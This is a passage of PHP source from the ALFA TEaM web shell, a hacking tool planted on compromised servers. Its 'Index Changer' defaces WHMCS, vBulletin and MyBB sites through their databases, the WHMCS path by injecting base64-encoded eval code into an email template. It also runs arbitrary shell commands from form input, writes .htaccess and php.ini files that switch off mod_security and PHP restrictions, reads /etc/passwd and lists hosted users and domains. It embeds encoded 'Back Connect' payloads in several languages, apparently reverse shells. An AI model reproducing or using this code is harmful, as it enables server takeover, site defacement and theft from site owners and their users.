    echo "<div class=header><center><p><div class=\"txtfont_header\">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,null,'whmcs')\">| Whmcs | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,'vb',null)\">| vBulletin | </a><a href=javascript:void(0) onclick=\"g('IndexChanger',null,null,'mybb')\">| MyBB | </a></h3></center>";
    if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'whmcs') {
        echo __pre();
        echo "<center><center><div class='txtfont_header'>| Whmcs |</div>\n<p><center>" . getConfigHtml('whmcs') . "<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">\n";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<br><div class='txtfont'>| Your Index |</div><br>\n<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\n<input type='submit' value=' '>\n</form></center></center>";
        if (isset($_POST['alfa6'])) {
            $s0levisible = "Powered By Solevisible";
            $dbu = $_POST['alfa6'];
            $path = $_POST['alfa5'];
            $fname = $_POST['alfa4'];
            $dbn = $_POST['alfa7'];
            $dbp = $_POST['alfa8'];
            $dbh = $_POST['alfa9'];
            $index = $_POST['alfa10'];
            $index = str_replace("\\'", "'", $index);
            $deface = '$x = base64_decode("' . __ZW5jb2Rlcg($index) . '"); $solevisible = fopen("' . $fname . '","w"); fwrite($solevisible,$x);';
            $saveData = __ZW5jb2Rlcg($deface);
            $Def = '{php}eval(base64_decode("' . $saveData . '"));{/php}';
            if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                $soleGet = mysqli_fetch_assoc($soleSave);
                $tempSave1 = $soleGet['message'];
                $tempSave = str_replace("'", "\\'", $tempSave1);
                $inject = "UPDATE tblemailtemplates SET message='{$Def}' WHERE name='Password Reset Validation'";
                $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn));
                $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn));
                if (function_exists('curl_version')) {
                    $AlfaSole = new AlfaCURL(true);
                    $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                    $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                    $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                    $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                    $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                    __alert('File Created...');
                    echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>";
                } else {
                    echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" " . $path . "/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" " . $path . "/" . $fname . " \"</font></b></center><br><br>";
                }
            }
        }
    }
    if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'vb') {
        echo __pre();
        echo "<center><center><div class='txtfont_header'>| vBulletin |</div>\n<p><center>" . getConfigHtml('vb') . "<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">\n";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<br><div class='txtfont'>| Your Index |</div><br>\n<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\n<input type='submit' value=' '></form></center></center>";
        if ($_POST['alfa8'] == '>>') {
            $s0levisible = "Powered By Solevisible";
            $dbu = $_POST['alfa2'];
            $dbn = $_POST['alfa3'];
            $dbp = $_POST['alfa4'];
            $dbh = $_POST['alfa5'];
            $index = $_POST['alfa6'];
            $prefix = $_POST['alfa7'];
            $index = str_replace("\\'", "'", $index);
            $set_index = "{\${eval(base64_decode(\\'";
            $set_index .= __ZW5jb2Rlcg("echo \"{$index}\";");
            $set_index .= "\\'))}}{\${exit()}}";
            if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='spacer_open'";
                $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . "" . $s0levisible . "' WHERE title='FORUMHOME'";
                $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . "" . $s0levisible . "', stylevars='', csscolors='', editorstyles=''";
                @mysqli_query($conn, $loli1) or die(mysqli_error($conn));
                @mysqli_query($conn, $loli2) or die(mysqli_error($conn));
                @mysqli_query($conn, $loli3) or die(mysqli_error($conn));
                __alert('VB index changed...!');
            }
        }
    }
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
        echo __pre();
        echo "<center><center><div class='txtfont_header'>| Mybb |</div>\n<p><center>" . getConfigHtml('mybb') . "<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>\n";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<br><div class='txtfont'>| Your Index |</div><br>\n<textarea name=mybbindex rows='19' cols='103'>\n<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
        if (isset($_POST['alfa6'])) {
            $mybb_dbh = $_POST['alfa6'];
            $mybb_dbu = $_POST['alfa7'];
            $mybb_dbn = $_POST['alfa8'];
            $mybb_dbp = $_POST['alfa9'];
            $mybb_index = $_POST['alfa10'];
            if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) {
                $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn));
                $prefix = "mybb_";
                $loli7 = "UPDATE mybb_templates SET template='" . $mybb_index . "' WHERE title='index'";
                $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn));
                __alert('MyBB index changed...!');
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaproc()
{
    alfahead();
    echo "<Div class=header><br><center>";
    if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
    }
    if ($GLOBALS['sys'] == "win") {
        $process = array("Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
    } else {
        $process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab");
    }
    foreach ($process as $n => $link) {
        echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
    }
    echo "</center><br>";
    if (!empty($_POST['alfa1'])) {
        echo "<pre class='ml1' style='margin-top:5px' >";
        if (isset($GLOBALS["glob_chdir_false"]) && !empty($_POST["c"])) {
            $cmd = "cd '" . addslashes($_POST["c"]) . "';";
        }
        echo alfaEx($cmd . $_POST['alfa1']);
        echo "</pre>";
    }
    echo "</div>";
    alfafooter();
}
function alfasafe()
{
    alfahead();
    echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
    echo "<h3><a href=javascript:void(0) onclick=\"g('safe',null,'php.ini',null)\">| PHP.INI | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,'ini')\">| .htaccess(apache) | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,'pl')\">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,'passwd')\">| Read-Passwd | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,'users')\">| Read-Users | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,'valiases')\">| Get-User | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,null,null,'domains')\">| Get-Domains | </a></center></h3>";
    if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {
        if (!_alfa_file_exists("/etc/virtual/domainowners")) {
            echo __pre();
            $solevisible9 = _alfa_file('/etc/named.conf');
            if (is_array($solevisible9)) {
                foreach ($solevisible9 as $solevisible13) {
                    if (@eregi('zone', $solevisible13)) {
                        preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
                        if (strlen(trim($solevisible14[1][0])) > 2) {
                            echo $solevisible14[1][0] . '<br>';
                        }
                    }
                }
            }
        } else {
            echo __pre();
            $users = _alfa_file("/etc/virtual/domainowners");
            if (is_array($users)) {
                foreach ($users as $boz) {
                    $dom = explode(":", $boz);
                    echo $dom[0] . "\n";
                }
            }
        }
    }
    if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') {
        echo "\n<form onsubmit=\"g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;\" method=\"post\" /><center><div class=\"txtfont\">Url: </font><input type=\"text\" placeholder=\"site.com\" name=\"site\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center>";
        if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>') {
            if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                $site = trim($_POST['alfa7']);
                $rep = str_replace(array("https://", "http://", "www."), "", $site);
                $user = "";
                if (function_exists("posix_getpwuid") && function_exists("fileowner")) {
                    if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
                        $user = $user['name'];
                    }
                } else {
                    if (_alfa_can_runCommand(true, true)) {
                        $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep);
                    }
                }
                if (!empty($user) && $user != 'root') {
                    echo __pre() . "<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                } else {
                    echo __pre() . '<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
                }
            } else {
                $site = trim($_POST['alfa7']);
                $rep = str_replace(array("https://", "http://", "www."), "", $site);
                $users = _alfa_file("/etc/virtual/domainowners");
                foreach ($users as $boz) {
                    $ex = explode(":", $boz);
                    if ($ex[0] == $rep) {
                        echo __pre() . "<center><table border='1'>\n<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">" . trim($ex[1]) . "</font></b></td></tr>\n<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                        break;
                    }
                }
            }
        }
    }
    if (!empty($_POST['alfa5']) && isset($_POST['alfa5'])) {
        if (!_alfa_file_exists("/etc/virtual/domainowners")) {
            echo __pre();
            $i = 0;
            while ($i < 60000) {
                $line = @posix_getpwuid($i);
                if (!empty($line)) {
                    while (list($key, $vl) = each($line)) {
                        echo $vl . "\n";
                        break;
                    }
                }
                $i++;
            }
        } else {
            echo __pre();
            $users = _alfa_file("/etc/virtual/domainowners");
            foreach ($users as $boz) {
                $user = explode(":", $boz);
                echo trim($user[1]) . '<br>';
            }
        }
    }
    if (!empty($_POST['alfa4']) && isset($_POST['alfa4'])) {
        echo __pre();
        if (_alfa_can_runCommand(true, true)) {
            echo __read_file("/etc/passwd");
        } elseif (function_exists("posix_getpwuid")) {
            for ($uid = 0; $uid < 60000; $uid++) {
                $ara = @posix_getpwuid($uid);
                if (!empty($ara)) {
                    while (list($key, $val) = each($ara)) {
                        echo "{$val}:";
                    }
                    echo "\n";
                }
            }
        } else {
            __alert('failed...');
        }
    }
    if (!empty($_POST['alfa2']) && isset($_POST['alfa2'])) {
        @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
        echo "<center><b><big>htaccess for Apache created...!</center></b></big>";
    }
    if (!empty($_POST['alfa1']) && isset($_POST['alfa1'])) {
        @__write_file($GLOBALS['cwd'] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
        echo "<center><b><big> php.ini created...!</center></b></big>";
    }
    if (!empty($_POST['alfa3']) && isset($_POST['alfa3'])) {
        @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
        echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>";
    }
    echo "<br></div>";
    alfafooter();
}
function __get_resource($content)
{
    return @gzinflate(__ZGVjb2Rlcg($content));
}
function __write_file($file, $content)
{
    if ($fh = @fopen($file, "wb")) {
        if (fwrite($fh, $content) !== false) {
            return true;
        }
    }
    return false;
}
function bcinit($evalType, $evalCode, $evalOptions, $evalArguments)
{
    $res = "<font color='green'>[ Success...! ]</font>";
    $err = "<font color='red'>[ Failed...! ]</font>";
    if ($evalOptions != "") {
        $evalOptions .= " ";
    }
    if ($evalArguments != "") {
        $evalArguments = " " . $evalArguments;
    }
    if ($evalType == "c") {
        $tmpdir = ALFA_TEMPDIR;
        chdir($tmpdir);
        if (is_writable($tmpdir)) {
            $uniq = substr(md5(time()), 0, 8);
            $filename = $evalType . $uniq . ".c";
            $path = $filename;
            if (__write_file($path, $evalCode)) {
                $ext = $GLOBALS['sys'] == 'win' ? ".exe" : ".out";
                $pathres = $filename . $ext;
                $evalOptions = "-o " . $pathres . " " . $evalOptions;
                $cmd = "gcc " . $evalOptions . $path;
                alfaEx($cmd);
                if (is_file($pathres)) {
                    if (chmod($pathres, 0755)) {
                        $cmd = $pathres . $evalArguments;
                        alfaEx($cmd);
                    } else {
                        $res = $err;
                    }
                    unlink($pathres);
                } else {
                    $res = $err;
                }
                unlink($path);
            } else {
                $res = $err;
            }
        }
        return $res;
    } elseif ($evalType == "java") {
        $tmpdir = ALFA_TEMPDIR;
        chdir($tmpdir);
        if (is_writable($tmpdir)) {
            if (preg_match("/class\\ ([^{]+){/i", $evalCode, $r)) {
                $classname = trim($r[1]);
                $filename = $classname;
            } else {
                $uniq = substr(md5(time()), 0, 8);
                $filename = $evalType . $uniq;
                $evalCode = "class " . $filename . " { " . $evalCode . " } ";
            }
            $path = $filename . ".java";
            if (__write_file($path, $evalCode)) {
                $cmd = "javac " . $evalOptions . $path;
                alfaEx($cmd);
                $pathres = $filename . ".class";
                if (is_file($pathres)) {
                    if (chmod($pathres, 0755)) {
                        $cmd = "java " . $filename . $evalArguments;
                        alfaEx($cmd);
                    } else {
                        $res = $err;
                    }
                    unlink($pathres);
                } else {
                    $res = $err;
                }
                unlink($path);
            } else {
                $res = $err;
            }
        }
        return $res;
    }
    return false;
}
function alfaconnect()
{
    alfahead();
    $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
    $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
    $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
    $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
    $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
    $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
    $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
    echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
